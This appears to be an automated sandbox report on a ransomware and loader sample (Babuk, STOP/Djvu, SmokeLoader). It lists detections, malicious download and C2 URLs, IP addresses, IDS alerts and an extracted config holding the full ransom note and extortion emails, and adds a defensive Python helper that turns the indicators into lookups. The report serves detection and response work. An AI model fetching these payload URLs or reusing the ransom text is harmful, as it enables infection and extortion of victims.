Windows Analysis Report
XVM5nluelx.exe

Overview

General Information

Sample name: XVM5nluelx.exe
Renamed because the original name is a hash value
Original sample name: b6e3a49931797e98183072cf02f58d26.exe
Analysis ID: 1447254
MD5: b6e3a49931797e98183072cf02f58d26
SHA1: 6ef79d91ad2f98e869a729f56280c507298ba0f3
SHA256: 6f480d8bf96773150f0939254a71eb20e447d30580aab7abf171ecb0e0094698
Tags: 32exe
Infos:

Detection

Babuk, Djvu, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies existing user documents (likely ransomware behavior)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses cmd line tools excessively to alter registry or file data
Writes a notice file (html or txt) to demand a ransom
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

Name: Babuk
Description: Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and an old 32-bit PE executable were observed over time as well. It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

Name: STOP, Djvu
Description: STOP/Djvu Ransomware encrypts user data with AES-256 and appends one of dozens of available extensions as a marker to the encrypted file's name. It does not encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution: SMOKY SPIDER
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

AV Detection

Source: XVM5nluelx.exe Avira: detected
Source: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54e Avira URL Cloud: Label: malware
Source: http://193.233.132.167/lend/jfesawdr.exe Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54-D Avira URL Cloud: Label: malware
Source: https://api.2ip.ua/q Avira URL Cloud: Label: malware
Source: http://sdfjhuz.com/dl/buildz.exe Avira URL Cloud: Label: malware
Source: https://nessotechbd.com/TEMPradius.exe Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54KS Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php Avira URL Cloud: Label: malware
Source: https://www.safeautomationbd.com/klok.exe Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54 Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54L Avira URL Cloud: Label: malware
Source: https://api.2ip.ua/geo.jsondll Avira URL Cloud: Label: malware
Source: https://api.2ip.ua/geo.jsonM Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\dejcbcc Avira: detection malicious, Label: HEUR/AGEN.1311176
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Avira: detection malicious, Label: HEUR/AGEN.1311176
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Avira: detection malicious, Label: HEUR/AGEN.1311176
Source: 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0871PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", 
"C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
Source: 00000004.00000002.2342373288.0000000002E30000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}
Source: C:\Users\user\AppData\Roaming\dejcbcc ReversingLabs: Detection: 31%
Source: XVM5nluelx.exe ReversingLabs: Detection: 31%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Roaming\dejcbcc Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Joe Sandbox ML: detected
Source: XVM5nluelx.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 9_2_0040E870
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_0040EA51 CryptDestroyHash,CryptReleaseContext, 9_2_0040EA51
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 9_2_0040EAA0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_0040EC68 CryptDestroyHash,CryptReleaseContext, 9_2_0040EC68
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext, 9_2_00410FC0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_00411178 CryptDestroyHash,CryptReleaseContext, 9_2_00411178
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 14_2_0040E870
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0040EA51 CryptDestroyHash,CryptReleaseContext, 14_2_0040EA51
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 14_2_0040EAA0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0040EC68 CryptDestroyHash,CryptReleaseContext, 14_2_0040EC68
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext, 14_2_00410FC0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00411178 CryptDestroyHash,CryptReleaseContext, 14_2_00411178
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_a21241c9-6
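The two extracted configurations above are the part of this section a responder reuses: the Djvu "Ignore Files" list says which paths the ransomware leaves alone (the drop location C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe sits inside an excluded directory, so the payload never encrypts itself), and the ransom note carries the contact addresses and the victim ID. The Python below is an added example, not code from this report or from Joe Sandbox, that turns a shortened copy of those two configurations into lookups. The three rule shapes (exact file name, extension, directory prefix with %username% expanded) are read off the list's contents; case-insensitive comparison and prefix matching are assumptions, since the report does not say how the sample compares paths.

```python
import ntpath
import re
from urllib.parse import urlparse

# Shortened copy of the two configurations printed by the report's extractor.
# The Djvu "Ignore Files" list is truncated here (the report's copy repeats it for D: and E:);
# the ransom note keeps only the lines the lookups below need.
DJVU_CONFIG = {
    "Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"],
    "C2 url": "http://cajgtus.com/test1/get.php",
    "Ransom note file": "_readme.txt",
    "Ransom note": (
        "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\n"
        "To get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\n"
        "Reserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\n"
        "Your personal ID:\r\n0871PsawqS"
    ),
    "Ignore Files": [
        "ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol",
        ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms",
        "C:\\SystemID\\", "C:\\Users\\Public\\", "C:\\ProgramData\\", "C:\\Windows\\",
        "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\",
        "C:\\Program Files\\", "C:\\Program Files (x86)\\",
    ],
}
SMOKELOADER_CONFIG = {
    "Version": 2022,
    "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php",
                "http://trade-inmyus.com/index.php"],
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def split_ignore_rules(ignore_list):
    """Sort the Ignore Files entries into the three shapes present in the list:
    directory prefixes (end in a backslash), extensions (start with a dot), exact file names."""
    dirs = [e for e in ignore_list if e.endswith("\\")]
    exts = [e.lower() for e in ignore_list if e.startswith(".") and "\\" not in e]
    names = [e.lower() for e in ignore_list
             if not e.endswith("\\") and not (e.startswith(".") and "\\" not in e)]
    return dirs, exts, names


def is_ignored(path, username, ignore_list=DJVU_CONFIG["Ignore Files"]):
    """True if the exclusion list covers this path, i.e. the ransomware would leave it alone.
    Assumptions (the report does not say how the sample compares paths): comparisons are
    case-insensitive, %username% is the victim's account name, and directory entries are
    prefix matches on the full path."""
    dirs, exts, names = split_ignore_rules(ignore_list)
    lowered = path.lower()
    base = ntpath.basename(lowered)
    if base in names or ntpath.splitext(base)[1] in exts:
        return True
    return any(lowered.startswith(d.replace("%username%", username).lower()) for d in dirs)


def note_contacts(note=DJVU_CONFIG["Ransom note"]):
    """Contact addresses in the ransom note, the indicator a victim is told to write to."""
    return sorted(set(EMAIL_RE.findall(note)))


def personal_id(note=DJVU_CONFIG["Ransom note"]):
    """The per-victim ID the note prints after 'Your personal ID:'."""
    m = re.search(r"Your personal ID:\s*(\S+)", note)
    return m.group(1) if m else None


def network_iocs():
    """Hostnames and URL paths from both configurations, ready for a blocklist or a proxy search."""
    urls = (DJVU_CONFIG["Download URLs"] + [DJVU_CONFIG["C2 url"]]
            + SMOKELOADER_CONFIG["C2 list"])
    parsed = [urlparse(u) for u in urls]
    return {"hosts": sorted({p.hostname for p in parsed}),
            "paths": sorted({p.path for p in parsed})}


if __name__ == "__main__":
    # The sample's own drop directory is excluded, so the dropped copy survives encryption.
    print(is_ignored(r"C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe", "user"))
    print(is_ignored(r"C:\Users\user\Documents\budget.xlsx", "user"))
    print(note_contacts(), personal_id())
    print(network_iocs())
```

The exclusion check is the practical piece during triage: run it over a file listing to separate paths that were never in scope for the encryptor from paths that are missing because they were encrypted or deleted.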

Compliance

Source: C:\Users\user\AppData\Local\Temp\33A3.exe Unpacked PE file: 9.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Unpacked PE file: 14.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Unpacked PE file: 16.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Unpacked PE file: 23.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Unpacked PE file: 26.2.33A3.exe.400000.0.unpack
Source: XVM5nluelx.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe File created: C:\_readme.txt
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe File created: C:\Users\user\_readme.txt
Source: C:\Users\user\Desktop\XVM5nluelx.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50431 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50438 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50441 version: TLS 1.2
Source: unknown HTTPS traffic detected: 103.174.152.66:443 -> 192.168.2.5:50442 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50451 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.5:50454 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50461 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.5:50470 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:50474 version: TLS 1.2
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 33A3.exe, 33A3.exe, 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 33A3.exe, 00000008.00000002.2396691282.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000D.00000002.2433122057.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 9_2_00410160
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 9_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 9_2_0040FB98
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 14_2_00410160
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 14_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 14_2_0040FB98

Networking

Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57636 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57637 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57638 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57639 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57640 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57641 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57642 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57643 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50429 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50430 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50432 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50434 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50436 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50437 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50439 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50444 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50445 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50446 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50447 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50448 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.5:50449 -> 187.170.192.109:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50450 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 187.170.192.109:80 -> 192.168.2.5:50449
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50452 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50453 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50455 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50456 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50457 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50458 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50459 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50460 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50462 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50463 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50464 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50465 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.5:50466 -> 91.92.253.69:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50467 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50469 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50471 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50473 -> 158.160.165.129:80
Source: C:\Windows\explorer.exe Network Connect: 103.174.152.66 443
Source: C:\Windows\explorer.exe Network Connect: 193.233.132.167 80
Source: C:\Windows\explorer.exe Network Connect: 91.92.253.69 80
Source: C:\Windows\explorer.exe Network Connect: 185.154.13.143 80
Source: C:\Windows\explorer.exe Network Connect: 192.185.16.114 443
Source: C:\Windows\explorer.exe Network Connect: 162.159.129.233 443
Source: C:\Windows\explorer.exe Network Connect: 158.160.165.129 80
Source: C:\Windows\explorer.exe Network Connect: 104.196.109.209 443
Source: C:\Windows\explorer.exe Network Connect: 189.195.132.134 80
